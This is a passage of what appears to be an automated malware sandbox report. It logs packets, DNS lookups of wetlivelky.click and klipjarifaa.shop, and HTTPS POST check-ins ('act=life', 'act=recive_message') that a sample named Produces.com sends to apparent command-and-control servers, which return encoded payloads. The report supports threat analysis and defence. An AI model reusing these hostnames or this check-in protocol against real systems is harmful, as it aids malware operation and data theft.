                                                                                            Dec 27, 2024 10:12:24.129256964 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.129306078 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.253705978 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.253737926 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.253792048 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.253801107 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.253834009 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.253849983 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.259623051 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.259646893 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.259699106 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.259706974 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.259732962 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.259747982 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.301752090 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.301789999 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.301846027 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.301860094 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.301887035 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.301906109 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.306129932 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.306205988 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.306216955 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.306250095 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.306278944 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.312148094 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.312169075 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.312242985 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.312253952 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.318072081 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.318099976 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.318149090 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.318166018 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.318190098 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.324058056 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.324079037 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.324146032 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.324160099 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.329647064 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.329668045 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.329742908 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.329761028 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.373454094 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.455578089 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.455591917 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.455666065 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.455707073 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.455715895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.455746889 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.455761909 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.461504936 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.461527109 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.461586952 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.461595058 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.461633921 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.461643934 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.511300087 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.511333942 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.511416912 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.511429071 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.511459112 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.511482000 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.517314911 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.517353058 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.517410994 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.517422915 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.517452002 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.517467976 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.522547960 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.522569895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.522629976 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.522641897 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.522681952 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.528604031 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.528662920 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.528695107 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.528707981 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.528740883 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.528750896 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.534537077 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.534585953 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.534624100 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.534635067 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.534667969 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.534688950 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.540153980 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.540199995 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.540235996 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.540246964 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.540271997 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.540298939 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.657802105 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.657856941 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.657901049 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.657908916 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.657968044 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.663543940 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.663593054 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.663629055 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.663636923 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.663650036 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.666404963 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.666441917 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.666450024 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.666466951 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.666508913 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.666513920 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.666620970 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.667332888 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.677063942 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.677078962 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:24.677088022 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:24.677093029 CET44349763104.21.74.235192.168.2.4

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 27, 2024 10:10:59.721632004 CET6110253192.168.2.41.1.1.1
                                                                                            Dec 27, 2024 10:10:59.961899042 CET53611021.1.1.1192.168.2.4
                                                                                            Dec 27, 2024 10:11:40.689004898 CET6552353192.168.2.41.1.1.1
                                                                                            Dec 27, 2024 10:11:40.996412992 CET53655231.1.1.1192.168.2.4
                                                                                            Dec 27, 2024 10:12:03.586275101 CET6455853192.168.2.41.1.1.1
                                                                                            Dec 27, 2024 10:12:03.889301062 CET53645581.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 27, 2024 10:10:59.721632004 CET192.168.2.41.1.1.10xf022Standard query (0)cCOKcDhDNH.cCOKcDhDNHA (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:11:40.689004898 CET192.168.2.41.1.1.10x5d39Standard query (0)wetlivelky.clickA (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:12:03.586275101 CET192.168.2.41.1.1.10xaafeStandard query (0)klipjarifaa.shopA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 27, 2024 10:10:59.961899042 CET1.1.1.1192.168.2.40xf022Name error (3)cCOKcDhDNH.cCOKcDhDNHnonenoneA (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:11:40.996412992 CET1.1.1.1192.168.2.40x5d39No error (0)wetlivelky.click104.21.25.41A (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:11:40.996412992 CET1.1.1.1192.168.2.40x5d39No error (0)wetlivelky.click172.67.222.171A (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:12:03.889301062 CET1.1.1.1192.168.2.40xaafeNo error (0)klipjarifaa.shop104.21.74.235A (IP address)IN (0x0001)false
                                                                                            Dec 27, 2024 10:12:03.889301062 CET1.1.1.1192.168.2.40xaafeNo error (0)klipjarifaa.shop172.67.164.160A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • wetlivelky.click
                                                                                            • klipjarifaa.shop

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449739104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:42 UTC263OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2024-12-27 09:11:43 UTC1119INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=scjvnbcn8a08cit0iijtq8gpl6; expires=Tue, 22 Apr 2025 02:58:21 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2tqwSri8FV4DNOgfW4tqHVAQd9Y%2BFEktxVqTIVObL68SvusG6oXUQ14OINf8kWTtqzM4kGNMYBFlZFyRk4Ijq9b03JnYQWZV9IqAx8cvCRtpsiRuBb3s5RC%2Fmo3V1e4F8oQb"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882f4aec404267-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1588&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1811414&cwnd=234&unsent_bytes=0&cid=b9f6ced7d2444324&ts=744&x=0"
                                                                                            2024-12-27 09:11:43 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2024-12-27 09:11:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449740104.21.25.414436636C:\Users\user\AppData\Local\Temp\174436\Produces.com
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-27 09:11:44 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 47
                                                                                            Host: wetlivelky.click
                                                                                            2024-12-27 09:11:44 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 58 47 44 52 2d 2d 4c 69 6c 6c 79 4c 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=VXGDR--LillyL&j=
                                                                                            2024-12-27 09:11:45 UTC1119INHTTP/1.1 200 OK
                                                                                            Date: Fri, 27 Dec 2024 09:11:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=mnpc4l550o9ngpkqo2ftm1rt9q; expires=Tue, 22 Apr 2025 02:58:23 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IKITAdt89aTnVfExkKW81phhsyfz5N1syqyKSg9wGD62RPcnlpIvFFQ4LbWg6F2CeOJbcAW%2F7e3qKS1VfNTwYJqHz97Rmjy5C5vHawC%2BwSarP23jpdKenfImVzAcMB1BKX9m"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f882f577ec772a4-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1799&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=947&delivery_rate=1615938&cwnd=212&unsent_bytes=0&cid=c5306b6e4fc79e6b&ts=804&x=0"
                                                                                            2024-12-27 09:11:45 UTC250INData Raw: 63 34 34 0d 0a 51 43 4e 4b 44 4a 7a 37 6d 33 44 36 52 75 79 6e 64 72 77 70 5a 4a 79 51 2b 51 52 45 32 45 6e 75 6a 4b 63 48 4e 58 53 48 63 44 63 37 41 54 77 75 70 73 2b 33 55 6f 6b 6a 7a 70 30 43 7a 6c 77 42 73 4c 4b 59 59 47 62 69 4c 34 2f 67 31 47 49 5a 56 76 45 64 46 58 70 46 4b 32 44 76 6e 72 64 53 6e 7a 37 4f 6e 53 33 48 43 77 48 79 73 73 4d 6d 49 62 49 72 6a 2b 44 46 5a 6c 34 62 39 78 78 55 4b 45 38 74 5a 50 6d 59 2f 78 47 57 4b 34 6e 43 45 39 31 44 43 76 58 39 6b 57 6c 6d 39 47 75 4c 39 6f 55 39 46 7a 6e 69 42 46 59 4e 51 6a 6c 6e 76 6f 61 33 43 39 67 6a 67 6f 56 4d 6e 6b 67 42 2f 76 79 66 59 43 2b 77 49 59 62 6f 78 47 4e 66 42 4f 34 57 58 79 68 42 4c 6d 58 7a 6b 65 73 63 6e 43 79 43 78 42 6e 64 43 30 69 2b 39 59 4d 6d 66 76 70 34 76
                                                                                            Data Ascii: c44QCNKDJz7m3D6RuyndrwpZJyQ+QRE2EnujKcHNXSHcDc7ATwups+3Uokjzp0CzlwBsLKYYGbiL4/g1GIZVvEdFXpFK2DvnrdSnz7OnS3HCwHyssMmIbIrj+DFZl4b9xxUKE8tZPmY/xGWK4nCE91DCvX9kWlm9GuL9oU9FzniBFYNQjlnvoa3C9gjgoVMnkgB/vyfYC+wIYboxGNfBO4WXyhBLmXzkescnCyCxBndC0i+9YMmfvp4v
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 75 33 55 64 45 49 62 39 52 51 56 50 51 38 78 4c 76 6d 56 75 55 72 59 4c 49 4c 4c 45 64 31 45 41 66 2f 79 69 57 6b 6d 75 53 4f 45 36 73 39 71 57 42 6e 72 47 46 49 71 53 43 39 68 2b 5a 48 2f 48 5a 74 6b 77 49 55 54 78 67 74 65 76 74 4b 4c 5a 53 57 75 4a 70 32 75 32 69 74 4f 56 75 49 65 46 58 6f 42 4c 6d 44 2f 6c 50 6b 41 6b 43 2b 46 77 41 62 56 51 67 76 7a 38 70 5a 73 4b 62 6b 72 69 2b 54 50 61 6c 30 53 36 42 39 54 49 6b 46 6f 49 4c 36 65 34 56 4c 41 5a 4b 33 41 42 4e 6c 48 45 4c 7a 49 32 33 6c 6f 6f 32 75 4c 34 6f 55 39 46 78 37 67 45 56 59 70 54 69 74 6d 39 59 76 35 41 4a 34 70 69 39 63 53 32 30 55 4d 2f 65 43 52 61 43 43 35 49 6f 66 6e 77 47 4a 54 56 71 74 53 55 6a 6f 42 63 43 37 66 6c 50 49 65 6b 6a 4f 4f 68 51 75 51 55 6b 62 35 2f 74 73 2b 5a 72 34 71
                                                                                            Data Ascii: u3UdEIb9RQVPQ8xLvmVuUrYLILLEd1EAf/yiWkmuSOE6s9qWBnrGFIqSC9h+ZH/HZtkwIUTxgtevtKLZSWuJp2u2itOVuIeFXoBLmD/lPkAkC+FwAbVQgvz8pZsKbkri+TPal0S6B9TIkFoIL6e4VLAZK3ABNlHELzI23loo2uL4oU9Fx7gEVYpTitm9Yv5AJ4pi9cS20UM/eCRaCC5IofnwGJTVqtSUjoBcC7flPIekjOOhQuQUkb5/ts+Zr4q
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 56 51 44 71 56 4b 46 51 68 43 50 47 33 30 32 38 77 52 6c 69 71 4a 30 31 54 42 42 52 2b 2b 39 5a 63 6d 66 76 6f 6d 6a 65 62 44 64 31 67 62 35 68 78 62 4c 55 51 6e 5a 76 36 5a 39 42 65 63 4c 34 58 47 47 64 70 5a 44 50 37 36 6e 6d 63 73 73 47 76 43 72 73 4a 39 46 30 36 6c 49 30 49 70 41 78 31 74 38 4a 66 2b 42 4e 67 37 77 4e 78 55 32 55 64 47 70 72 4b 57 62 69 4f 2f 4a 49 33 6b 79 32 42 64 47 75 30 63 56 6a 42 4f 4c 47 37 79 6b 66 4d 66 6c 69 43 47 7a 42 2f 56 54 51 62 2f 2b 4e 73 6f 5a 72 30 7a 7a 4c 61 46 55 56 41 61 36 42 30 58 46 30 49 6d 59 50 6d 50 75 51 33 57 50 63 37 43 47 4a 34 54 52 76 4c 37 6d 32 30 73 76 69 75 4c 34 38 42 6d 55 42 58 6f 46 56 38 73 52 69 78 69 39 35 54 2f 45 70 38 67 69 39 63 52 31 30 63 4b 76 72 7a 62 59 54 37 36 63 38 7a 42 77
                                                                                            Data Ascii: VQDqVKFQhCPG3028wRliqJ01TBBR++9ZcmfvomjebDd1gb5hxbLUQnZv6Z9BecL4XGGdpZDP76nmcssGvCrsJ9F06lI0IpAx1t8Jf+BNg7wNxU2UdGprKWbiO/JI3ky2BdGu0cVjBOLG7ykfMfliCGzB/VTQb/+NsoZr0zzLaFUVAa6B0XF0ImYPmPuQ3WPc7CGJ4TRvL7m20sviuL48BmUBXoFV8sRixi95T/Ep8gi9cR10cKvrzbYT76c8zBw
                                                                                            2024-12-27 09:11:45 UTC159INData Raw: 6c 47 31 77 77 54 79 5a 6e 38 35 2f 78 46 5a 59 70 68 63 4d 66 32 55 77 41 38 2f 71 57 59 79 57 37 4c 34 62 38 78 6d 35 64 47 2b 39 53 47 32 4a 47 4d 43 36 6d 32 64 34 65 73 54 53 56 31 77 4b 65 56 45 6a 6e 73 70 78 71 5a 75 4a 72 6a 2b 48 4d 61 6c 38 65 36 68 31 52 4c 45 63 75 59 2f 75 57 38 77 43 51 4b 6f 50 4f 47 39 56 5a 42 76 50 32 6c 32 49 75 73 53 48 4d 6f 49 56 69 54 31 61 39 55 6d 41 76 54 69 68 74 36 4e 6e 6d 58 49 46 6b 69 63 6c 55 68 67 73 4b 38 50 4b 55 0d 0a
                                                                                            Data Ascii: lG1wwTyZn85/xFZYphcMf2UwA8/qWYyW7L4b8xm5dG+9SG2JGMC6m2d4esTSV1wKeVEjnspxqZuJrj+HMal8e6h1RLEcuY/uW8wCQKoPOG9VZBvP2l2IusSHMoIViT1a9UmAvTiht6NnmXIFkiclUhgsK8PKU
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 33 63 64 38 0d 0a 61 69 71 78 49 34 33 69 79 32 4a 53 48 2b 30 61 52 79 4e 46 49 47 2f 77 6c 76 67 57 6e 53 47 4b 77 68 44 59 52 45 61 77 73 70 78 2b 5a 75 4a 72 6f 38 6e 77 4a 33 59 73 70 51 30 62 4f 77 45 76 59 72 37 42 75 52 36 62 4b 49 62 4b 45 74 64 48 44 50 66 35 6c 32 30 69 74 69 4b 4a 36 4d 52 67 55 68 66 68 48 6c 38 6b 51 69 74 68 38 5a 62 78 55 74 5a 6b 69 64 31 55 68 67 73 6a 36 66 6d 56 59 47 61 6c 5a 5a 57 75 77 6d 6b 58 54 71 55 65 58 43 52 48 4c 57 4c 2f 6e 2f 45 58 6b 43 43 50 77 78 4c 64 52 41 4c 37 38 35 52 69 4b 72 51 68 6a 65 2f 4a 62 6c 67 64 34 46 49 62 59 6b 59 77 4c 71 62 5a 79 42 47 4f 4d 35 37 4a 56 4d 45 46 48 37 37 31 6c 79 5a 2b 2b 69 71 65 35 4d 39 72 55 68 6e 67 45 56 6f 6c 54 43 35 69 39 4a 44 78 46 4a 63 74 6e 4d 59 59 30
                                                                                            Data Ascii: 3cd8aiqxI43iy2JSH+0aRyNFIG/wlvgWnSGKwhDYREawspx+ZuJro8nwJ3YspQ0bOwEvYr7BuR6bKIbKEtdHDPf5l20itiKJ6MRgUhfhHl8kQith8ZbxUtZkid1Uhgsj6fmVYGalZZWuwmkXTqUeXCRHLWL/n/EXkCCPwxLdRAL785RiKrQhje/Jblgd4FIbYkYwLqbZyBGOM57JVMEFH771lyZ++iqe5M9rUhngEVolTC5i9JDxFJctnMYY0
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 2f 6d 33 51 70 76 53 79 46 35 64 64 76 55 42 48 75 47 6c 34 74 52 7a 70 69 38 49 76 38 41 49 70 6b 77 49 55 54 78 67 74 65 76 73 53 63 64 6a 61 35 61 62 33 34 78 6e 4e 63 47 2b 6c 53 53 6d 78 59 61 47 6e 79 32 61 46 53 6e 69 75 48 78 68 76 66 51 67 72 7a 39 35 4a 6a 4a 37 77 76 68 75 54 46 59 31 45 58 34 42 68 57 49 30 73 68 61 66 61 65 2b 67 44 59 61 73 37 43 44 4a 34 54 52 74 66 31 69 57 67 32 2b 6a 54 43 39 34 56 69 57 31 61 39 55 6c 45 6f 54 69 78 70 38 70 2f 38 46 4a 55 6c 67 63 51 55 30 55 38 4e 39 2f 53 61 61 79 4f 33 4c 35 37 6b 7a 6d 70 62 48 2b 6b 66 46 57 77 42 4c 33 61 2b 77 62 6b 6a 6c 53 71 41 77 67 4b 65 56 45 6a 6e 73 70 78 71 5a 75 4a 72 6a 65 4c 4b 5a 6c 67 56 35 68 4e 66 4d 46 4d 6b 5a 2f 61 63 39 52 6d 57 49 70 7a 44 47 39 64 49 42 66
                                                                                            Data Ascii: /m3QpvSyF5ddvUBHuGl4tRzpi8Iv8AIpkwIUTxgtevsScdja5ab34xnNcG+lSSmxYaGny2aFSniuHxhvfQgrz95JjJ7wvhuTFY1EX4BhWI0shafae+gDYas7CDJ4TRtf1iWg2+jTC94ViW1a9UlEoTixp8p/8FJUlgcQU0U8N9/SaayO3L57kzmpbH+kfFWwBL3a+wbkjlSqAwgKeVEjnspxqZuJrjeLKZlgV5hNfMFMkZ/ac9RmWIpzDG9dIBf
                                                                                            2024-12-27 09:11:45 UTC1369INData Raw: 61 50 6f 36 69 2f 2b 46 50 55 45 47 38 68 56 4b 62 46 68 6f 61 66 4c 5a 6f 56 4b 65 4c 59 6a 43 45 74 42 5a 41 2f 6a 39 6c 47 38 76 76 69 4f 50 37 73 46 68 55 42 50 6d 48 6c 34 6c 51 69 64 71 39 35 66 77 48 64 68 71 7a 73 49 4d 6e 68 4e 47 33 2b 6d 59 61 69 76 36 4e 4d 4c 33 68 57 4a 62 56 72 31 53 57 53 78 45 4b 47 54 34 6e 66 77 55 6b 69 47 4f 7a 68 66 52 54 77 44 36 2f 5a 74 74 4c 37 73 74 69 65 54 4f 59 31 6f 56 34 78 51 56 62 41 45 76 64 72 37 42 75 54 4b 44 4b 59 4c 43 56 4d 45 46 48 37 37 31 6c 79 5a 2b 2b 69 43 41 36 73 4a 6c 57 68 58 74 46 31 45 6f 52 43 68 6d 37 4a 48 35 46 59 6f 32 6a 73 77 52 30 6b 67 47 2b 76 53 53 59 43 57 2b 61 38 4b 75 77 6e 30 58 54 71 55 2f 57 53 56 6f 4c 33 57 2b 68 72 63 4c 32 43 4f 43 68 55 79 65 53 67 33 30 2f 5a 5a
                                                                                            Data Ascii: aPo6i/+FPUEG8hVKbFhoafLZoVKeLYjCEtBZA/j9lG8vviOP7sFhUBPmHl4lQidq95fwHdhqzsIMnhNG3+mYaiv6NML3hWJbVr1SWSxEKGT4nfwUkiGOzhfRTwD6/ZttL7stieTOY1oV4xQVbAEvdr7BuTKDKYLCVMEFH771lyZ++iCA6sJlWhXtF1EoRChm7JH5FYo2jswR0kgG+vSSYCW+a8Kuwn0XTqU/WSVoL3W+hrcL2COChUyeSg30/ZZ
